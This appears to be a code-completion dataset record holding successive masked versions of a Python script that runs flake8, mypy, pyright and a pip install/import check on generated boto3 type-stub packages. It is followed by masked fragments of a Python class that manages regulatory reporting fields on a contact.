stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\n<mask token>\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers 
snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\ndef run_flake8(path: Path) ->None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call([sys.executable, '-m', 'flake8',\n '--ignore',\n 'E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803'\n , path.as_posix()], stderr=f, stdout=f)\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, 
stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\ndef run_mypy(path: Path) ->None:\n \"\"\"\n Check output with mypy.\n \"\"\"\n try:\n output = subprocess.check_output([sys.executable, '-m', 'mypy',\n path.as_posix()], stderr=subprocess.STDOUT, encoding='utf8')\n except subprocess.CalledProcessError as e:\n output = e.output\n errors = []\n for message in output.splitlines():\n if not message or message.startswith('Found'):\n continue\n if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):\n continue\n errors.append(message)\n if errors:\n raise SnapshotMismatchError('\\n'.join(errors)) from None\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n 
'--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\nif __name__ == 
'__main__':\n main()\n",
"step-4": "<mask token>\nROOT_PATH = Path(__file__).parent.parent.resolve()\nLOGGER_NAME = 'check_output'\nIGNORE_PYRIGHT_ERRORS = (\n '\"get_paginator\" is marked as overload, but no implementation is provided',\n '\"get_waiter\" is marked as overload, but no implementation is provided',\n 'Method \"paginate\" overrides class \"Paginator\" in an incompatible manner',\n 'Method \"wait\" overrides class \"Waiter\" in an incompatible manner',\n 'define variable \"items\" in incompatible way',\n 'define variable \"values\" in incompatible way', 'must return value',\n 'Import \"types_aiobotocore_', 'Import \"mypy_boto3_')\nIGNORE_MYPY_ERRORS = (\n 'Signature of \"create_client\" incompatible with supertype \"Session\"',\n 'Signature of \"paginate\" incompatible with supertype \"Paginator\"',\n 'Signature of \"wait\" incompatible with supertype \"Waiter\"', 'note:')\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = 
parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\ndef run_flake8(path: Path) ->None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call([sys.executable, '-m', 'flake8',\n '--ignore',\n 'E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803'\n , path.as_posix()], stderr=f, stdout=f)\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\ndef run_mypy(path: Path) ->None:\n \"\"\"\n Check output with mypy.\n \"\"\"\n try:\n output = subprocess.check_output([sys.executable, '-m', 'mypy',\n path.as_posix()], stderr=subprocess.STDOUT, encoding='utf8')\n except subprocess.CalledProcessError as e:\n output = e.output\n errors = []\n for message in output.splitlines():\n if not message or message.startswith('Found'):\n continue\n if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):\n continue\n errors.append(message)\n if errors:\n raise SnapshotMismatchError('\\n'.join(errors)) from None\n\n\ndef run_call(path: 
Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find 
package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nChecker of generated packages.\n\n- [x] import generated package\n- [x] flake8\n- [x] pyright\n- [x] mypy\n\"\"\"\nimport argparse\nimport json\nimport logging\nimport subprocess\nimport sys\nimport tempfile\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Optional\n\nROOT_PATH = Path(__file__).parent.parent.resolve()\nLOGGER_NAME = \"check_output\"\nIGNORE_PYRIGHT_ERRORS = (\n '\"get_paginator\" is marked as overload, but no implementation is provided',\n '\"get_waiter\" is marked as overload, but no implementation is provided',\n # 'Expected type arguments for generic class \"ResourceCollection\"',\n # 'Type \"None\" cannot be assigned to type',\n # '\"__next__\" is not present',\n # 'Import \"boto3.s3.transfer\" could not be resolved',\n # \"is partially unknown\",\n 'Method \"paginate\" overrides class \"Paginator\" in an incompatible manner',\n 'Method \"wait\" overrides class \"Waiter\" in an incompatible manner',\n 'define variable \"items\" in incompatible way',\n 'define variable \"values\" in incompatible way',\n \"must return value\",\n 'Import \"types_aiobotocore_',\n 'Import \"mypy_boto3_',\n)\nIGNORE_MYPY_ERRORS = (\n 'Signature of \"create_client\" incompatible with supertype \"Session\"',\n 'Signature of \"paginate\" incompatible with supertype \"Paginator\"',\n 'Signature of \"wait\" incompatible with supertype \"Waiter\"',\n \"note:\",\n)\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) -> logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter(\"%(levelname)s %(message)s\", datefmt=\"%H:%M:%S\")\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n 
logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() -> CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument(\"-d\", \"--debug\", action=\"store_true\")\n parser.add_argument(\"-x\", \"--exit-on-error\", action=\"store_true\")\n parser.add_argument(\"-p\", \"--path\", type=Path, default=ROOT_PATH / \"mypy_boto3_output\")\n parser.add_argument(\"filter\", nargs=\"*\")\n args = parser.parse_args()\n return CLINamespace(\n debug=args.debug,\n path=args.path,\n filter=args.filter,\n exit_on_error=args.exit_on_error,\n )\n\n\ndef run_flake8(path: Path) -> None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile(\"w+b\") as f:\n try:\n subprocess.check_call(\n [\n sys.executable,\n \"-m\",\n \"flake8\",\n \"--ignore\",\n \"E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803\",\n path.as_posix(),\n ],\n stderr=f,\n stdout=f,\n )\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) -> None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile(\"w+b\") as f:\n try:\n subprocess.check_call(\n [\"npx\", \"pyright\", path.as_posix(), \"--outputjson\"],\n stderr=subprocess.DEVNULL,\n stdout=f,\n )\n return\n except subprocess.CalledProcessError:\n pass\n\n temp_path = Path(f.name)\n output = temp_path.read_text()\n\n data = json.loads(output).get(\"generalDiagnostics\", [])\n errors = []\n for error in data:\n message = error.get(\"message\", \"\")\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n\n if errors:\n messages = []\n for error in errors:\n messages.append(\n 
f'{error[\"file\"]}:{error[\"range\"][\"start\"][\"line\"]} {error.get(\"message\", \"\")}'\n )\n raise SnapshotMismatchError(\"\\n\".join(messages))\n\n\ndef run_mypy(path: Path) -> None:\n \"\"\"\n Check output with mypy.\n \"\"\"\n try:\n output = subprocess.check_output(\n [sys.executable, \"-m\", \"mypy\", path.as_posix()],\n stderr=subprocess.STDOUT,\n encoding=\"utf8\",\n )\n except subprocess.CalledProcessError as e:\n output = e.output\n errors = []\n for message in output.splitlines():\n if not message or message.startswith(\"Found\"):\n continue\n if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):\n continue\n errors.append(message)\n\n if errors:\n raise SnapshotMismatchError(\"\\n\".join(errors)) from None\n\n\ndef run_call(path: Path) -> None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / \"__main__.py\").exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f\"Path {path} cannot be imported: {e}\") from None\n\n\ndef run_import(path: Path) -> None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / \"__main__.py\").exists():\n return\n try:\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"install\", \"--no-input\", path.parent.as_posix()],\n stdout=subprocess.DEVNULL,\n )\n if (path / \"__main__.py\").exists():\n subprocess.check_call(\n [sys.executable, \"-c\", f\"import {path.name}\"],\n stdout=subprocess.DEVNULL,\n )\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"uninstall\", \"--no-input\", \"-y\", path.name],\n stdout=subprocess.DEVNULL,\n )\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f\"Path {path} cannot be imported: {e}\") from None\n\n\ndef is_package_dir(path: Path) -> bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if 
path.name.endswith(\".egg-info\"):\n return False\n if (path / \"__init__.pyi\").exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) -> None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f\"Running flake8 for {path.name} ...\")\n run_flake8(path)\n logger.debug(f\"Running mypy for {path.name} ...\")\n run_mypy(path)\n logger.debug(f\"Running pyright for {path.name} ...\")\n run_pyright(path)\n\n if (path / \"__main__.py\").exists():\n logger.debug(f\"Running call for {path.name} ...\")\n run_call(path)\n logger.debug(f\"Running import for {path.name} ...\")\n run_import(path)\n\n\ndef find_package_path(path: Path) -> Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() -> None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith(\"_package\"):\n continue\n\n if args.filter and not any(s in folder.as_posix() for s in args.filter):\n continue\n\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f\"Checking {folder.name}/{package_path.name} ...\")\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n\n if has_errors:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
13,
14,
16,
17,
19
]
}
|
[
13,
14,
16,
17,
19
] |
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
    def __init__(self, contact=None):
        """Cache all regulatory-reporting data held on an acm.FContact.

        Arguments:
        contact -- the acm.FContact whose regulatory AdditionalInfos are
                   wrapped; without it an error is logged and the instance
                   is left unpopulated.
        """
        try:
            self.__contact = contact
            if not self.__contact:
                FRegulatoryLogger.ERROR(logger,
                    'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'
                    )
                # Bail out early: without a contact there is nothing to cache.
                return None
            # Cached regulatory attributes, populated from the contact's
            # AdditionalInfo fields by __refresh below.
            self.__reg_date_of_birth = None
            self.__reg_first_name = None
            self.__reg_last_name = None
            self.__reg_national_id = None
            self.__reg_crm_id = None
            self.__crm_id_source = None
            self.__reg_exchange_id = None
            self.__reg_unique_name = None
            self.__client_type = None
            self.__is_general_partner = None
            if contact:
                self.__refresh(contact)
            self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
        except Exception as e:
            # Construction is best-effort: failures are logged, not raised.
            FRegulatoryLogger.ERROR(logger, str(e))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = (
'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'
% reg_date_of_birth)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.
__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name=VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name
)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name=VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id=VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.
__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id=VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.
__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
<|reserved_special_token_0|>
def UniqueName(self, unique_name=VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if (FIntegrationUtils.FIntegrationUtils.
get_acm_version_override() >= 2017.2):
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(
self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(
unique_name)
except:
pass
else:
msg = (
'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'
% (unique_name, self.__contact.Fullname(),
self.__contact.Party().Name(), contact_name))
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
<|reserved_special_token_0|>
def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(
is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is being set to <%s>.' % str(self.
__is_general_partner))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.
__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == 'None':
FRegulatoryLogger.DEBUG(logger,
'The IsGeneralPartner is None. Hence defaulting it to False'
)
self.__is_general_partner = False
return self.__is_general_partner
    def __setattr__(self, attr, val):
        # Route attribute assignment: private/mangled names (leading '_')
        # are stored directly via the normal mechanism, while public names
        # are dispatched to the accessor method of the same name, so
        # `obj.FirstName = x` behaves like `obj.FirstName(x)`.
        # NOTE(review): an unknown public name is silently ignored --
        # confirm this silent drop is intended rather than raising.
        if attr.startswith('_'):
            super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
        elif hasattr(self, attr):
            getattr(self, attr)(val)
<|reserved_special_token_0|>
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, 'Contact')
FRegulatoryLogger.DEBUG(logger,
'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'
)
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FContactRegulatoryInfoBase(object):
    def __init__(self, contact=None):
        """Cache all regulatory-reporting data held on an acm.FContact.

        Arguments:
        contact -- the acm.FContact whose regulatory AdditionalInfos are
                   wrapped; without it an error is logged and the instance
                   is left unpopulated.
        """
        try:
            self.__contact = contact
            if not self.__contact:
                FRegulatoryLogger.ERROR(logger,
                    'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'
                    )
                # Bail out early: without a contact there is nothing to cache.
                return None
            # Cached regulatory attributes, populated from the contact's
            # AdditionalInfo fields by __refresh below.
            self.__reg_date_of_birth = None
            self.__reg_first_name = None
            self.__reg_last_name = None
            self.__reg_national_id = None
            self.__reg_crm_id = None
            self.__crm_id_source = None
            self.__reg_exchange_id = None
            self.__reg_unique_name = None
            self.__client_type = None
            self.__is_general_partner = None
            if contact:
                self.__refresh(contact)
            self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
        except Exception as e:
            # Construction is best-effort: failures are logged, not raised.
            FRegulatoryLogger.ERROR(logger, str(e))
def __refresh(self, contact):
self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(
